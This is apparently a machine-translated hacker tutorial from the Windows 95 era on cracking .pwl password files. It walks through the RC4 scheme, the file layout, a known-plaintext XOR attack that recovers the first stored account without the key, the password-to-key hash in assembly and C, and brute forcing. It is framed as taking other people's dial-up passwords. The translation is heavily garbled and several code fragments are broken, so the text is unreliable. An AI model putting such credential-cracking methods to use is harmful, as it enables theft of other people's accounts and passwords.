Perspective WIN95 password file

Perspective WIN95 password file

============================================================================================================================================================================================================= =======

Author: Su Junming, welcome to spread .......................

Sjmisbesthacker ...........................

============================================================================================================================================================================================================= =======

Basically, if your computer has made some people used it, it is likely that your password has been taken by others.

I know (including UserName & Password), as long as Copy is in Win95

The .pwl file under the directory can be decoded, then your network fee may be inexplicably increased.

Someone asked: But my win95 needs to type password when login, don't know my password!

Need to know that you want to get. Thepwl file is not necessarily to enter Win95, just press the DOS magnetic filter OR to press F4

IIF8 ...

There is a program on the Internet called glide.exe. This program claims that it can solve .pwl file, it is true,

However, this program has some congenital restrictions so that there may be only one small part of the Southone. Believe

Some people have tried this format. I will explain the principle of this process and why in most love.

In this case, only a small part can be solved. Fortunately, this "a small part" has already included the first set of complete

UserName & Password.

Win95 is an RC4 encoding method. This algorithm is irreversible, that is, you can't

The .pwl file is removed from the original, unless you have key (or violence) · The younger brother talks about RC4

Probably stream

Cheng:

You have a 32-bit key & information (called SDATA)

The following is what the decoding program is:

1. Initialize a table, this Table's data structure is

{

UNSIGNED Char Table [256];

Unsigned char char x, y;

}

It fills tables in 0, 1, 2, ..... FFH, and finalize X, Y to 00.

2. Take this 256 bytes, do some SWAP actions according to Key, complete

After that, this Table seems to be aligned.

Currently, it is an action on [initialization].

Among the decoding action:

3.

For (counter = 0; length of counter

{

X = (x 1)% 256;

Y = (Table [x] y)% 256;

SWAP (& Table [x], & Table [Y]);

XOR_INDEX = (Table [X] Table [Y])% 256; SDATA [counter] ^ = Table [xor_index];

}

Therefore, during the decoding period, not only the x, y is changed, and even the contents of Table are also changing.

**** Key ****

Suppose SDATA is 100 bytes,

If I want to unlock 20 Byte, the process is 1 -> 2 -> 3

Then I will judge whether the 20 BYTE is the right information, if the IF is correct, I will

Unlock the remaining 90 BYTE processes are 2-> 3, if divided into a plurality of pieces,

The stroke should still be like this:

1 -> 2 -> 3 solutions the most in front of 20 byte

2-> 3 remember 20 byte

2-> 3 remember 20 byte

2-> 3 remember 20 byte

2-> 3 remember 20 byte

Anyway, the first time is starting with 1 !!! :)

============================================================================================================================================================================================================= ==

The PWL format is (starting from 0208h):

20 Byte (username)

2 Byte (the first group in the OFFSET) ----------------

2 Byte (second group in the file of the OFFSET) -------------- |

....... | | | |

TAG1: Length (2 byte), "Connected to" name, Password <- -

Length (2 Byte), "Connected to" name, Password <-

============================================================================================================================================================================================================= ==

The Win95 probably procedure is:

1 -> 2 -> 3 Decoding to TAG1 minus 1 (UserName is now in this time)

UserName <> Username at 95)

{

The password column of the dial-up network will be empty (even if the storage password is taking)

(It is useless to jump to stepp1, because Key is not right, then solve it is not right.)

}

Else {

Step1: 1 -> 2 -> 3 begins with the place from TAG1.

While (notnd)

{

2-> 3 solution 2 Byte (getting length, assume that it is yy)

2 -> 3 解 解 个TE (get "connected to" Name & Password)

If the name (and "connected to" is in line with the name)

{

Fill the Password into the password bar;

Break;

}

}

}

Win95's problem is that it is more capital in Username, and less than 20 Byte is filled in blank.

Worse, PWL's file is UserName, based on this principle, we have learned that each 20byte each byte

Each is what XOR is Dongdong, we assume that:

12 4F 33 20 7F F6 D9 3C 63 AA 11 40 32 DE 46 55 77 2C 3A AD

In fact, it can be analyzed from PWL to a few groups of accounts. What is it analyzed? I have forgotten. Anyway, it is!

SO, 0108H Group * 2 = TAG1.

Ha, I already know that the first group of accounts have there. (0108h is fixed)

Okey knowing the position of the first group, I just got the 2 Byte, which is next to username.

Now we have 22 Byte!

How to solve the first group?

Because 95 is overdown at STEP1, 1-> 2 -> 3

So we can use our luck directly.

The 22 BYTE will give it to XOR from the TAG1.

If "wiring to" name password length

Not long ----> completely revealed no legacy (may show a little bit of the second group!)

The above is the principle used by GLIDE.EXE (without key at all, KEY is exiting)

If you have to put all your accounts (Hinet'SeedNet 'into big "not! There are so many accounts, borrowing a group

Can you use it?) All, I am sorry, you must know KEY.

/ __ in large BBS and girl Talk, wrong.

What is it coming to Key?

When we enter WIN95, do you have a Dialog that enters a password?

Yes, it is to use this password.

Exchange! (No words, you didn't set your password, your key = 00000000h)

The following is the program that Win95 will transfer to Key to Key (the last EAX is your key):

PUSH ESI

XOR EAX, EAX

MOV Si, password length 1

CMP Si, AX

JZ 7FCB19E7

MOV EDX, OFFSET Password

Movzx ECX, Byte Ptr [EDX]

7fcb19d1:

Add Eax, ECX

Inc EDX

MOV ECX, EAX

SHL ECX, 7

SHR EAX, 19H

OR ECX, EAX

Dec Si

MOV EAX, ECX

JNZ 7FCB19D1

7fcb19e7:

POP ESI

Ret 8

Well, the combination language is more chaotic, and it is seen in C (the same as the result):

Unsigned long result = 0L;

For (i = 0; i

{

INT TMP = (int) (Result >> 25);

Result = Toupper (Password [i]);

Result = (Result << 7) | TMP;

}

It's all the time to turn, add it!

So if you know that someone enters the Win95 password, you can calculate the key, you can get someone.

All accounts used. How to do it? Hey, this doesn't have to write any programs, just use Softice

Yes, all the actions are in MSPWL32.DLL, set a breakpoint, one set, convenient and easy to use.

If you don't even know the password of this person into Win95, then use violence.

1. Edit your password -> transfer to key -> RC4 -> What! The top 20Byte's UserName is not right - again -

^ / ----------------------------------------------------------------------------------------------------------------------- -----------

2. Specify a key -> RC4 -> What! The top 20Byte's UserName is not right - come -

^ / ----------------------------------------------------------------------------------------------------------------------- ---- That is good, you have to look at your luck. :)

Glide.exe seems to be in YHQ, don't know ..... Forgot ????????

Note:

These bugs later Microsoft out of the update program of MSPWL32.DLL, I heard that this can solve this

Question. I haven't tried it, so I don't know. You can see your top 4 Byte of your .pwl file.

Whether it is B0H, "MFN", if it is, you have dangerous !!!